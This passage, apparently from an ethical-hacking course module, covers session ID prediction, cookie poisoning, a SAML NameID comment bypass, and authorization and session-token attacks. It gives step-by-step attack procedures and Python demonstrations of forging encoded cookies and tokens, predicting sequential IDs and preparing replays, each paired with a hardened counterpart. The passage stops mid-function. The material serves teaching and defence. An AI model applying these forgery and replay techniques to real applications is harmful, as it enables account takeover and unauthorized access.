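    X-Forwarded-Host) is not on the allow-list, since that already signals tampering."""
    headers = request.get("headers", {})
    for name in ("Host", "X-Forwarded-Host"):
        value = headers.get(name)
        if value is not None and value.split(":")[0].lower() not in ALLOWED_HOSTS:
            raise ValueError(f"unexpected {name} header: {value!r}")
    return f"https://{CANONICAL_HOST}{RESET_PATH}?{urlencode({'token': token})}"


if __name__ == "__main__":
    token = "87654321-8765-8765-8765-10987654321"   # placeholder token from the text
    evil = {"method": "POST", "path": "/reset.php", "headers": {"Host": "badhost.com"}}
    print(reset_link_vulnerable(evil, token))        # https://badhost.com/reset-password.php?token=...
    try:
        reset_link_fixed(evil, token)
    except ValueError as e:
        print("rejected:", e)
```

Web frameworks usually expose an allowed-hosts setting for exactly this purpose; the point is that the canonical hostname must come from server configuration, never from anything the client sends.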
Session Attacks: Session ID Prediction/Brute-forcing

Every time a user logs in to a particular website, the server assigns a session ID to the user to
keep track of all the activities on the website. This session ID is valid until the user logs out; the
server provides a new session ID when the user logs in again. Attackers try to exploit this
session ID mechanism by guessing the next session ID after collecting some valid ones.


For certain web applications, the session ID information involves a string of fixed width.
Randomness is essential to avoid prediction.
Session attacks are performed in the following steps:
■ In the first step, collect some valid session ID values by sniffing traffic from
authenticated users.
■ Analyze the captured session IDs to determine the session ID generation process, such
as the structure of the session ID, the information that is used to create it, and the
encryption or hash algorithm used by the application to protect it.
■ Vulnerable session generation mechanisms that use session IDs composed of a
username or other predictable information, such as timestamp or client IP address, can
be exploited by easily guessing valid session IDs.
■ In addition, you can implement a brute-force technique to generate and test different
values of the session ID until you successfully gain access to the application.
In the request below, the session ID is carried in the JSESSIONID cookie and its value is
"user01," which corresponds to the username. By guessing the next value, say "user02," the
attacker can gain unauthorized access to another user's session.
GET http://janaina:8180/WebGoat/attack?Screen=17&menu=410 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Referer: http://janaina:8180/WebGoat/attack?Screen=17&menu=410
Cookie: JSESSIONID=user01                     <-- predictable session cookie
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

Figure 14.69: Screenshot displaying predictable session cookie
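An added Python example (not from the courseware) of the analysis step described above: given a handful of captured session IDs, it checks for a common prefix plus a counter, estimates per-character entropy, and predicts the next value when the numbers form an arithmetic sequence. The captured IDs are constructed to mirror the JSESSIONID=user01 pattern in the figure; the entropy threshold is a demo choice, not a standard:

```python
import math
import re
import secrets
from collections import Counter
from typing import List, Optional, Tuple

# Constructed capture mirroring the JSESSIONID=user01 pattern in the figure.
CAPTURED_IDS = ["user01", "user02", "user03"]


def entropy_per_char(ids: List[str]) -> float:
    """Shannon entropy (bits per character) over the pooled sample: a coarse
    randomness estimate. Hex IDs approach 4.0; counters score far lower."""
    counts = Counter("".join(ids))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def predict_next(ids: List[str]) -> Optional[str]:
    """If every ID is the same alphabetic prefix plus a number and the numbers form
    an arithmetic sequence, return the predicted next ID, keeping zero-padding."""
    matches = [re.fullmatch(r"([A-Za-z_-]*)(\d+)", s) for s in ids]
    if len(ids) < 2 or not all(matches) or len({m.group(1) for m in matches}) != 1:
        return None
    nums = [int(m.group(2)) for m in matches]
    steps = {b - a for a, b in zip(nums, nums[1:])}
    if len(steps) != 1:
        return None
    width = len(matches[0].group(2))
    return f"{matches[0].group(1)}{nums[-1] + steps.pop():0{width}d}"


def assess(ids: List[str], min_bits: float = 3.0) -> Tuple[str, Optional[str]]:
    """Verdict for a captured sample. min_bits is a demo threshold, not a standard."""
    nxt = predict_next(ids)
    if nxt is not None:
        return "predictable", nxt
    if entropy_per_char(ids) < min_bits:
        return "low-entropy", None
    return "acceptable", None


def secure_ids(n: int) -> List[str]:
    """What a server should issue instead: 128-bit random IDs from a CSPRNG."""
    return [secrets.token_hex(16) for _ in range(n)]


if __name__ == "__main__":
    print(assess(CAPTURED_IDS))   # ('predictable', 'user04')
    print(assess(secure_ids(20))) # ('acceptable', None)
```

Burp Sequencer performs a far more thorough statistical analysis of the same kind; the quick check here is enough to flag the counter-based scheme in the figure, and the secure_ids() function shows the property a real session ID must have: it is drawn from a cryptographic random source and is long enough that brute-forcing the space is hopeless.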

Cookie Exploitation: Cookie Poisoning
Cookies frequently carry sensitive values such as session identifiers from the client browser to
the server. If the server trusts their contents without verification, attackers can modify them
with ease to gain access to the server or assume the identity of another user.
HTTP is stateless, so applications use cookies to maintain session state: the server ties a
unique session to the individual accessing the web application and relies on the cookie to
recognize that individual on later requests. Poisoning of cookies and session information can
allow an attacker to inject malicious content, modify the user's online experience, and obtain
unauthorized information.
Cookies can contain session-specific data such as user IDs, passwords, account numbers, links
to shopping cart contents, supplied private information, and session IDs. They exist as files
stored in the client computer's memory or on its hard disk. By modifying the cookie data, an
attacker can often gain escalated access or maliciously affect the user's session. Many sites
offer the "Remember me?" function and store the user information in a cookie so that the user
does not have to re-enter the data with every visit to the site. Any private information entered
is stored in a cookie. To protect cookies, site developers often merely encode them. Encoded
cookies give developers a false sense of security, because encoding is not encryption: schemes
such as Base64 and ROT13 (rotating the letters of the alphabet through 13 positions) are
trivially reversed by anyone who holds the cookie. Integrity requires a server-side secret, for
example an HMAC over the cookie value, or better still a cookie that holds only an opaque
random session identifier with all state kept on the server.
Cookie poisoning is performed in the following steps:
■ If the cookie contains passwords or session identifiers, steal the cookie using techniques
such as script injection and eavesdropping
■ Then, replay the cookie with the same or altered passwords or session identifiers to
bypass web application authentication
■ Trap cookies using tools such as OWASP Zed Attack Proxy, and Burp Suite.
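An added Python example (not from the courseware) of the steps above against an encoded but unsigned cookie, alongside the HMAC-signed cookie that defeats tampering. The same applies to a "Remember Me" cookie such as RememberUser=jason. The cookie layout (Base64 of "user=...;role=...") and SECRET_KEY are constructed for the demo:

```python
import base64
import hashlib
import hmac

# Assumed server-side secret; a real deployment loads a random 256-bit key from secure config.
SECRET_KEY = b"replace-with-a-random-256-bit-key"


def encode_cookie(fields: dict) -> str:
    """Constructed cookie format: Base64 of 'k=v;k=v'. Encoding only, no protection."""
    raw = ";".join(f"{k}={v}" for k, v in fields.items()).encode()
    return base64.b64encode(raw).decode()


def decode_cookie(value: str) -> dict:
    raw = base64.b64decode(value).decode()
    return dict(kv.split("=", 1) for kv in raw.split(";"))


def poison(cookie: str, **changes) -> str:
    """Attacker step: decode, alter the fields, re-encode. Works against any server
    that trusts an unsigned cookie."""
    fields = decode_cookie(cookie)
    fields.update(changes)
    return encode_cookie(fields)


def server_role_unsigned(cookie: str) -> str:
    """Vulnerable server: believes whatever role the cookie claims."""
    return decode_cookie(cookie).get("role", "guest")


def sign_cookie(fields: dict) -> str:
    """Hardened issuance: payload plus HMAC-SHA256 over the payload, joined by '.'
    ('.' is not in the Base64 alphabet, so the split is unambiguous)."""
    payload = encode_cookie(fields)
    mac = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{mac}"


def server_role_signed(cookie: str) -> str:
    """Hardened server: reject any cookie whose MAC does not verify. The comparison
    is constant-time so the MAC cannot be guessed byte by byte."""
    try:
        payload, mac = cookie.rsplit(".", 1)
    except ValueError:
        return "guest"
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return "guest"
    return decode_cookie(payload).get("role", "guest")


if __name__ == "__main__":
    plain = encode_cookie({"user": "jason", "role": "user"})
    print(server_role_unsigned(poison(plain, role="admin")))   # admin  (poisoned)
    signed = sign_cookie({"user": "jason", "role": "user"})
    payload, mac = signed.rsplit(".", 1)
    print(server_role_signed(poison(payload, role="admin") + "." + mac))  # guest (rejected)
```

Signing stops tampering but not replay: a stolen signed cookie is still valid until it expires, so the session attributes above (Secure, HttpOnly, short lifetimes, server-side invalidation on logout) remain necessary.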
Cookie Exploitation Tools:

■ OWASP Zed Attack Proxy

Source: https://www.zaproxy.org
OWASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for web
applications. It provides automated scanners as well as a set of tools that allow you to
find security vulnerabilities manually.

[Figure: OWASP ZAP 2.11.1 in Standard Mode. The Request pane shows
GET http://www.moviescope.com/viewprofile.aspx?id=1 HTTP/1.1 with Host, User-Agent, Accept,
Referer, Cookie and Sec-Fetch-* headers; the History pane lists the proxied GET and POST
requests to www.moviescope.com with their status codes, response sizes and alert levels.]

Figure 14.70: Screenshot of OWASP ZAP

Some additional cookie exploitation tools are as follows:
■ L0phtCrack (https://l0phtcrack.gitlab.io)
■ Burp Suite (https://www.portswigger.net)
■ XSSer (https://xsser.03c8.net)
Bypass Authentication: Bypass SAML-based SSO

The single sign-on (SSO) authentication process permits a user to sign in to an application using
a single set of credentials, and the same login session can be used to access multiple
applications irrespective of the domain or platform. For instance, when a user logs in using
his/her Google account on a desktop or mobile device, he/she is automatically authenticated
for other services such as Google Drive, YouTube, and Gmail. This authentication mechanism
across different applications is performed using the SAML protocol.
Security Assertion Markup Language (SAML) is an XML-based framework that serves as an
authorization and authentication medium between two peers, such as an identity provider (IdP)
and a service provider (SP). The service provider entrusts the identity provider with validating
users. After validating a user, the identity provider responds with a SAML assertion (confirmation
message).

Figure 14.71: Illustration of SAML-based SSO (user browser, identity provider, and service provider, with the trust relationship between IdP and SP)

Traditional applications perform the authentication process themselves before granting the user
access to protected functions. With the evolution of the SSO infrastructure, this authentication
process has been handed over to third-party identity provider applications, on which the service
provider application relies before granting access to its functions. Communication between
these applications is established through SAML messages.
These SAML messages are Base64-encoded, which provides no confidentiality. Attackers can easily
decode these messages and read their content. Two major fields in SAML messages, the signature
and the assertion, are susceptible to tampering in transit. The signature is used to build a trust
relationship between the SP and the IdP, and the assertion is used to direct the SP on providing
application services to valid users.
Attackers can take advantage of signature misconfigurations, session expiry timeouts, session
replays, misdirected SAML messages, etc., to bypass SAML-based SSO authentication and insert
their own messages. Attackers use tools such as SAML Raider to bypass SAML-based SSO
authentication. SAML Raider is a Burp Suite extension used for SAML infrastructure testing. It
can be used to perform two core operations: modifying SAML messages and managing X.509
certificates.


Using SAML Raider

■ Configure the browser to proxy its traffic through Burp Suite. Open Burp Suite with a new
project and navigate to the "Proxy" tab to ensure that the proxy is activated.
■ In Burp Suite, first go to the "Extender" tab and then to the "BApp Store". Then, click
and install the "SAML Raider" extension.
■ In Burp Suite, ensure that the "Proxy" tab displays "Intercept is on". This enables
Burp to catch and tamper with requests directed to the servers. When the user's browser
is pointed to the target ([email protected]) website's secured registration page, Burp Suite
shows that the user is redirected to the IdP system.
■ SAML Raider displays a tab with the same name when there is SAML data to be
decoded. Users may need to forward a few more requests before they notice the "SAML
Raider" tab on a request. Clicking the "Forward" button takes the user to the
IdP login page.
■ Soon after the user enters the credentials for [email protected], Burp
once again intercepts some web requests. Until it shows the "SAML Raider" tab, keep
clicking the "Forward" button to pass them without modification. In this way, SAML
responses from the IdP system can also be intercepted.
■ Going through the response allows the user to find "NameID". It is located below the
key and signature tabs.

Figure 14.72: Screenshot of Burp Suite capturing SAML messages


■ Now, insert an XML comment between the two domain names in the NameID value and forward the response.

Figure 14.73: Screenshot of Burp Suite manipulating SAML messages

■ In this case, because the signature still matches the valid response, the SP approves it and
processes only the first text node in NameID: [email protected].
Attackers use this technique to bypass the SAML-based SSO process and tamper with the
responses.
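The NameID comment technique above succeeds only because the service provider reads the subject from the first text node while the signature check ignores comments. The following Python is an added example, not part of the course text or of SAML Raider: it parses a constructed, unsigned assertion with hypothetical domains and contrasts a flawed NameID extraction with one that rejects comments and joins all text nodes.

```python
from xml.dom import minidom

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"

# Constructed, unsigned assertion fragment with hypothetical domains. A real
# response carries an XML signature; exclusive canonicalization strips comments
# before hashing, which is why the inserted comment below does not break it.
ASSERTION_CLEAN = (
    '<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
    "<saml:Subject>"
    '<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">'
    "user@university.example.fakedomain.example"
    "</saml:NameID>"
    "</saml:Subject>"
    "</saml:Assertion>"
)

# The same assertion with an empty XML comment inserted into the NameID text.
ASSERTION_COMMENTED = ASSERTION_CLEAN.replace(
    "user@university.example.fakedomain.example",
    "user@university.example<!---->.fakedomain.example",
)


def _nameid_element(xml_text):
    """Locate the single NameID element by namespace and local name."""
    doc = minidom.parseString(xml_text)
    nodes = doc.getElementsByTagNameNS(SAML_NS, "NameID")
    if len(nodes) != 1:
        raise ValueError("expected exactly one NameID element")
    return nodes[0]


def extract_nameid_naive(xml_text):
    """Flawed extraction: returns only the first text node under NameID.

    minidom keeps comments as separate nodes, so a comment splits the subject
    into two Text nodes and this function silently returns just the first one.
    """
    return _nameid_element(xml_text).firstChild.data


def extract_nameid_strict(xml_text):
    """Hardened extraction: refuse any non-text child, then join all text."""
    element = _nameid_element(xml_text)
    for child in element.childNodes:
        if child.nodeType != child.TEXT_NODE:
            raise ValueError("NameID contains a comment or element: rejected")
    return "".join(child.data for child in element.childNodes)


def strict_accepts(xml_text):
    """True when the hardened extractor accepts the assertion."""
    try:
        extract_nameid_strict(xml_text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("naive, clean:     ", extract_nameid_naive(ASSERTION_CLEAN))
    print("naive, commented: ", extract_nameid_naive(ASSERTION_COMMENTED))
    print("strict, clean:    ", extract_nameid_strict(ASSERTION_CLEAN))
    print("strict accepts commented assertion?", strict_accepts(ASSERTION_COMMENTED))
```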





Attack Authorization Schemes


A web application contains an authorization mechanism that restricts access to a specific
resource or functionality (e.g., an Admin page) to authenticated users with the right privileges.
The web application always performs user authorization after authentication. An attacker
identifies flaws in the authorization mechanism of the web application and takes advantage of
them to access restricted pages by escalating privileges. The attacker tries to gain access to
information without proper credentials. To this end, the attacker uses various techniques to
attack the authorization schemes of the web application.
Authorization Attack

In an authorization attack, the attacker first finds a legitimate account with limited privileges,
then logs in as that user, and gradually escalates privileges to access protected resources.
He/she then manipulates the HTTP requests to subvert the application authorization schemes
by modifying input fields related to the user ID, username, access group, cost, file names, file
identifiers, etc. Attackers use sources such as uniform resource identifiers, parameter
tampering, POST data, HTTP headers, query strings, cookies, and hidden tags to perform
authorization attacks.
■ Uniform Resource Identifier: A uniform resource identifier (URI) provides a means to
identify a resource. It is a global identifier for Internet resources accessed remotely or
locally. An attacker may use URIs to access documents/directories that are protected
from publishing, inject SQL queries or other unused commands into an application,
and/or make a user view a certain site that is connected to another server.
■ Parameter Tampering: Parameter tampering involves the manipulation of parameters
exchanged between the server and the client to modify the application data, such as
the price and quantity of products, permissions, and user credentials. This information is
usually stored in cookies, URL query strings, or hidden form fields, and attackers can modify
it to gain additional control over the application and its functionality.
■ POST Data: POST data often comprises authorization and session information, as the
information provided by the client must be associated with the session that provided it.
The attacker can exploit vulnerabilities in how the POST data is handled and easily manipulate it.
■ HTTP Headers: Web browsers do not allow arbitrary header modification. Therefore, to modify
a header, the attacker has to write his/her own program to perform the HTTP
request. He/she may also use available tools to modify any data sent from the browser.
In general, an Authorization HTTP header contains a username and password encoded in
Base64. The attacker can compromise the header by submitting two HTTP requests
bound in the same header. The proxy system executes the first HTTP header and the
target system executes the other HTTP header, allowing the attacker to bypass the
proxy's access control.
■ Query String and Cookies: Browsers use cookies to maintain state over the stateless
HTTP protocol as well as to store user preferences, session tokens, and other data.
Clients can modify the cookies and send them to the server with URL requests, thereby
allowing the attacker to modify the cookie content. The impact of cookie modification depends
on the cookie usage, which ranges from session tokens to arrays used in authorization decisions.
■ Hidden Tags: When a user selects anything on an HTML page, the selection is stored as a
form field value and sent to the application in an HTTP request (GET or POST). HTML can
store field values as hidden fields, which the browser does not render on the screen;
instead, it collects and submits these fields as parameters during form submission,
and the user can manipulate them. Code sent to the browser cannot be trusted to enforce
security; therefore, by manipulating the hidden values, the attacker can easily alter what the
page submits when it runs in the browser.
Authorization Attack: HTTP Request Tampering

HTTP headers control information passed from web clients to web servers on HTTP requests
and from web servers to web clients on HTTP responses. Each header consists of a single text
line with a name and a value. There are two main ways to send data with HTTP: via the URL or
the form. Tampering with HTTP data refers to modifying data of the HTTP request (or response)
before the recipient reads it. The attacker changes the HTTP request without using another
user's ID.
■ Query String Tampering

If the query string is visible in the address bar in the browser, then try to change the
string parameter to bypass authorization mechanisms. You can use web spidering tools
such as Burp Suite to scan the web application for POST parameters.


http://www.certifiedhacker.com/mail.aspx?mailbox=john&company=acme%20com
https://certifiedhackershop.com/books/download/852741369.pdf
https://certifiedhackerbank.com/login/home.jsp?admin=true

Figure 14.74: Screenshot displaying Query String Tampering

■ HTTP Headers

If the application uses the Referer header for making access control decisions, then try
to modify it to access protected application functionalities. In the example below,
ItemID = 201 is not accessible as the Admin parameter is set to false; you can change it
to true and access protected items.

GET http://certifiedhacker:8180/Applications/Download?ItemID=201 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.04
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Proxy-Connection: keep-alive
Referer: http://certifiedhacker:8180/Applications/Download?Admin=False

Figure 14.75: Screenshot displaying HTTP Headers

Authorization Attack: Cookie Parameter Tampering

Cookie parameter tampering is a method used to tamper with the cookies set by the web
application to perform malicious attacks. When the user logs into the site, the web application
sets the session cookie and stores it in the browser.

Cookie parameter tampering is performed in the following steps:


1. In the first step, collect some session cookies set by the web application and analyze
them to determine the cookie generation mechanism

2. In the second step, trap the session cookie set by the web application, tamper with its
parameters using tools such as Burp Suite, and replay it to the application to gain
unauthorized access to others' profiles

3. The tool intercepts every request sent from the browser and allows you to edit the
cookie, replacing it with the tampered cookie parameters. If the cookie is not secure,
you may be able to guess the parameters
■ Burp Suite

Source: https://portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications.
It has various tools that work together to support the entire testing process, from initial
mapping and analysis of an application's attack surface to finding and exploiting security
vulnerabilities.


Figure 14.76: Screenshots of Burp Suite



Attack Access Controls


Access controls are part of the application's security mechanisms that are logically based on
authentication and session management. An attacker walks through a website to identify the
following access control details of the application:
■ Individual access to a particular subset of data
■ Levels of access granted (employees, managers, supervisors, CEOs, etc.)
■ Administrator functionality to configure and monitor
■ Functionalities that allow escalating privileges
Exploiting Insecure Access Controls

■ Parameter-Based Access Control: Any web application consists of various request
parameters such as cookies and query string parameters. The application determines
the access granted to a request based on these parameters. These parameters vary
between a normal user and an administrator. Sometimes, these parameters are invisible
to normal users and visible only to administrators. If an attacker can identify the
parameters that are assigned to an administrator, he/she can set those parameters in
his/her own requests and gain access to administrative functions.
■ Referer-Based Access Control: In some web applications, the HTTP Referer header is the
foundation for major access control decisions. The HTTP Referer is client-controlled and
therefore unsafe; the attacker can manipulate it to any value.
■ Location-Based Access Control: The user's geographic location can be determined using
various methods. The most common method to determine the current location is
through the IP address. Attackers can bypass location-based access controls using a web
proxy, a VPN, a data-roaming-enabled mobile device, or direct manipulation of client-side
mechanisms.
Access Controls Attack Methods

■ Attack with Different User Accounts: Attempt to access the application with different
user accounts. If there is any broken access control in the web application, it allows you
to access the resources and functionality of another legitimate user. You can use tools such as
Burp Suite to access and compare two different user contexts.
■ Attack Multistage Processes: The abovementioned technique will be ineffective if there
is a multistage process established in the web application architecture. In this multistage
process, the user performs multiple entries at multiple levels to complete the
intended process, so multiple requests are sent from the client to the server. To attack
such a process, each and every request to the server should be captured and tested for
access controls. Another way to attack a multistage process manually is to walk through
a protected multistage process several times in your browser and use proxy tools to
switch the session token supplied in different requests to that of a less privileged user.
■ Attack Static Resources: Identify the web applications where protected static
resources are accessed directly by URL. Attempt to request these URLs directly and check
whether they provide access to unauthorized users.
■ Attack Direct Access to Methods: Web applications accept certain requests that provide
direct access to server-side APIs. If there are any access control weaknesses in these
direct access methods, an attacker can exploit them and compromise the system.
■ Attack Restrictions on HTTP Methods: It is important to test different HTTP methods
such as GET, POST, PUT, DELETE, TRACE, and OPTIONS. The attacker modifies the HTTP
method of a request to compromise web applications. If the web application accepts these
modified requests, the access controls can be bypassed.
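The HTTP request tampering example earlier (the Admin flag in the query string and Referer header) and the parameter- and Referer-based access control weaknesses in this section share one root cause: the server takes an authorization decision from data the client supplies. The following Python is an added example, not from the course material or any product; it models such a request with constructed values (a hypothetical download URL, the ItemID=201 item, and a hypothetical server-side session store) and contrasts a flawed check that trusts those fields with one that derives the role from the server-side session only.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit


@dataclass
class Request:
    """Minimal model of an HTTP request as the application sees it."""
    url: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)

    def query(self):
        """Query-string parameters, first value wins."""
        return {k: v[0] for k, v in parse_qs(urlsplit(self.url).query).items()}


# Constructed server-side session store: session id -> record.
# The role is written only by the server at login; the client never supplies it.
SESSIONS = {
    "sid-low-priv": {"user": "john", "role": "user"},
    "sid-admin": {"user": "alice", "role": "admin"},
}

# Item identifiers whose download requires the admin role (constructed).
PROTECTED_ITEMS = {201}

# Hypothetical download endpoint modelled on the request shown in the text.
DOWNLOAD = "http://certifiedhacker.example:8180/Applications/Download"


def _item_id(req):
    try:
        return int(req.query().get("ItemID", "0"))
    except ValueError:
        return 0


def authorize_vulnerable(req):
    """Flawed scheme: the decision rests on an Admin/admin flag that the client
    sends in the query string, the Referer header, or a cookie."""
    if _item_id(req) not in PROTECTED_ITEMS:
        return True
    referer_query = parse_qs(urlsplit(req.headers.get("Referer", "")).query)
    client_claims = [
        req.query().get("admin", "false"),
        referer_query.get("Admin", ["False"])[0],
        req.cookies.get("admin", "false"),
    ]
    return any(claim.lower() == "true" for claim in client_claims)


def authorize_hardened(req):
    """Hardened scheme: the role is looked up from the server-side session bound
    to the session cookie; nothing else in the request is consulted."""
    session = SESSIONS.get(req.cookies.get("session", ""))
    if session is None:
        return False  # not authenticated at all
    if _item_id(req) not in PROTECTED_ITEMS:
        return True
    return session["role"] == "admin"


# Constructed requests: a low-privilege user as the text shows the request,
# the same user after tampering every client-side flag, and a real administrator.
REQ_LOW = Request(
    DOWNLOAD + "?ItemID=201",
    headers={"Referer": DOWNLOAD + "?Admin=False"},
    cookies={"session": "sid-low-priv"},
)
REQ_LOW_TAMPERED = Request(
    DOWNLOAD + "?ItemID=201&admin=true",
    headers={"Referer": DOWNLOAD + "?Admin=True"},
    cookies={"session": "sid-low-priv", "admin": "true"},
)
REQ_ADMIN = Request(
    DOWNLOAD + "?ItemID=201&admin=true",
    headers={"Referer": DOWNLOAD + "?Admin=True"},
    cookies={"session": "sid-admin"},
)


def evaluate(req):
    """Run both schemes on one request so their decisions can be compared."""
    return {"vulnerable": authorize_vulnerable(req), "hardened": authorize_hardened(req)}


if __name__ == "__main__":
    for name, req in (("low", REQ_LOW), ("low+tampered", REQ_LOW_TAMPERED), ("admin", REQ_ADMIN)):
        print(name, evaluate(req))
```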




Attack Session Management Mechanism


Web application session management involves exchanging sensitive information between the
server and its clients wherever required . If such session management is insecure, the attacker
can take advantage of it to attack the web application through the session management
mechanism, which is the key security component in most web applications.
Nowadays, most attackers target application session management to launch malicious attacks
against web applications, allowing them to easily bypass robust authentication controls and
masquerade as other users without even knowing their credentials (usernames, passwords).
Attackers can even take control of the entire application by compromising a system
administrator's account.
Session Management Attack

A session management attack is a method used by attackers to compromise a web application.


Attackers break an application's session management mechanism to bypass the authentication
controls and impersonate privileged application users. It involves two stages: session token
generation and exploitation of session token handling.
To generate a valid session token, attackers engage in the following:
• Session Token Prediction: Attackers can do this when they realize that the server uses a
deterministic pattern between session IDs. By successfully gaining the previous and next
session IDs of the user, the attacker can perform malicious attacks pretending to be the
user.
■ Session Token Tampering: Once the attackers gain the previous and next session ID,
they can tamper with the session data and engage in further malicious activities.


Once attackers generate a valid session token, they try to exploit session token handling as
follows:
■ Man-in-the-Middle (MITM) Attack: Attackers intercept communication between two
systems on a network. They divide the network connection into two: one between the
client and the attacker, and the other between the attacker and server, which then acts
as a proxy in the intercepted connection.
■ Session Hijacking: Attackers steal the user session ID from a trusted website to perform
malicious activities.
■ Session Replay: Attackers obtain the user session ID and then reuse it to gain access to
the user account.
Attacking Session Token Generation Mechanism
To determine the session token generation mechanism in a session management attack,
attackers steal valid session tokens and then predict the next session token .
Through session prediction, attackers identify a pattern in the session token exchanged
between the client and the server. This can happen when the web application has weak,
predictable session identifiers. For example, when the web application assigns a session token
sequentially, attackers can predict the previous and next session tokens by knowing any session
ID. Before predicting a session identifier, attackers have to obtain sufficient valid session tokens
for legitimate system users.
■ Weak Encoding Example
When hex encoding an ASCII string user=jason;app=admin;date=08/01/2020, you can
predict another session token by just changing the date and use it for another
transaction with the server.
https://www.certifiedhacker.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%30%38%2F%30%31%2F%32%30%32%30

■ Session Token Prediction
o Obtain valid session tokens by sniffing the traffic or by legitimately logging into the
application, and analyze them for encoding (hex encoding, Base64) or any pattern
o If any meaning can be reverse engineered from the sample of session tokens, attempt to guess
the tokens recently issued to other application users
o Make a large number of requests with the predicted tokens to a session-dependent page to
determine which of them are valid
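The decoding, forging and prediction steps above, as an added Python example (this is not code
from the original module): it takes the hex-encoded token from the text as a constructed
sample, recovers its fields, forges a token with a different user or date, and, for numeric
tokens, derives the previous and next values from a sample with a constant stride. The site and
user are hypothetical; nothing here talks to a server.

```python
import base64
import binascii
import re
from typing import Optional, Tuple
from urllib.parse import unquote

# Constructed sample token: the hex-encoded string from the text, as it would
# appear in a captured checkout URL (the site and user are hypothetical).
CAPTURED_TOKEN = (
    "%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
    "%64%61%74%65%3D%30%38%2F%30%31%2F%32%30%32%30"
)


def detect_encoding(token: str) -> str:
    """Classify a token as percent-hex, Base64 or unknown (opaque/random)."""
    if re.fullmatch(r"(%[0-9A-Fa-f]{2})+", token):
        return "percent-hex"
    try:
        raw = base64.b64decode(token, validate=True)
        if raw.decode("ascii").isprintable():
            return "base64"
    except (binascii.Error, UnicodeDecodeError):
        pass
    return "unknown"


def decode_token(token: str) -> dict:
    """Undo the percent encoding and split 'k=v;k=v' into a field map."""
    fields = {}
    for part in unquote(token).split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def encode_token(fields: dict) -> str:
    """Re-encode a field map exactly as the weak application does: one
    uppercase %XX escape per byte, fields joined with ';'."""
    plain = ";".join(f"{k}={v}" for k, v in fields.items())
    return "".join(f"%{b:02X}" for b in plain.encode("ascii"))


def forge_token(token: str, **overrides: str) -> str:
    """Decode a captured token, overwrite chosen fields (user, app, date...)
    and re-encode it. Nothing in the token authenticates its contents, so
    the forged value is accepted as readily as the original."""
    fields = decode_token(token)
    fields.update(overrides)
    return encode_token(fields)


def predict_sequential(samples: list) -> Optional[Tuple[int, int]]:
    """For numeric tokens issued with a constant stride, return the
    (previous, next) tokens around the sample; None if no constant stride."""
    values = [int(s) for s in samples]
    strides = {b - a for a, b in zip(values, values[1:])}
    if len(values) < 2 or len(strides) != 1:
        return None
    stride = strides.pop()
    return values[0] - stride, values[-1] + stride


if __name__ == "__main__":
    print(detect_encoding(CAPTURED_TOKEN), decode_token(CAPTURED_TOKEN))
    print(forge_token(CAPTURED_TOKEN, user="alice", date="08/02/2020"))
    print(predict_sequential(["1001", "1002", "1003"]))
```

The round trip encode_token(decode_token(t)) == t is the check that the encoding has been
understood; if it fails, the token carries something (a MAC, a random salt) that the naive
decoder missed, and forgery will not work.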
Attacking Session Tokens Handling Mechanism: Session Token Sniffing
First, sniff network traffic for valid session tokens and then use them to predict the next session
token. Use the predicted session ID to authenticate with the target web application.


The steps for session token sniffing are as follows:
■ Sniff the application traffic using a sniffing tool such as Wireshark or an intercepting
proxy such as Burp Suite
■ If HTTP cookies are the transmission mechanism for session tokens and the Secure flag is not
set, the browser also sends the cookie over plaintext HTTP, where it can be captured; replay
the captured cookie to gain unauthorized access to the application
■ Use the captured session cookies to perform session hijacking, session replay, and MITM
attacks
Thus, capturing a valid session token is the starting point for session management attacks.
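An added example (Python; not part of the original module) of what an analyst does with a
capture once it is off the wire: it parses a constructed HTTP response and the client's next
request (host, cookie name and value are made up), records which cookies were set without the
Secure and HttpOnly attributes, identifies the session cookie that was sent in cleartext and is
therefore replayable, and builds the replay request. The list of session cookie names is an
assumption.

```python
from typing import Dict, List, Tuple

# Constructed capture (not from a real site): one HTTP response and the
# client's next request, both observed in cleartext on TCP port 80.
CAPTURED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PHPSESSID=a3f9c2e1d4b7; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/; Secure; HttpOnly\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
CAPTURED_REQUEST = (
    "GET /viewprofile.aspx?id=1 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: PHPSESSID=a3f9c2e1d4b7; theme=dark\r\n"
    "\r\n"
)

# Cookie names commonly used to carry the session token (assumed list).
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid",
                        "sessionid", "session", "sid"}


def parse_headers(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Return the start line and the (lower-cased name, value) header list."""
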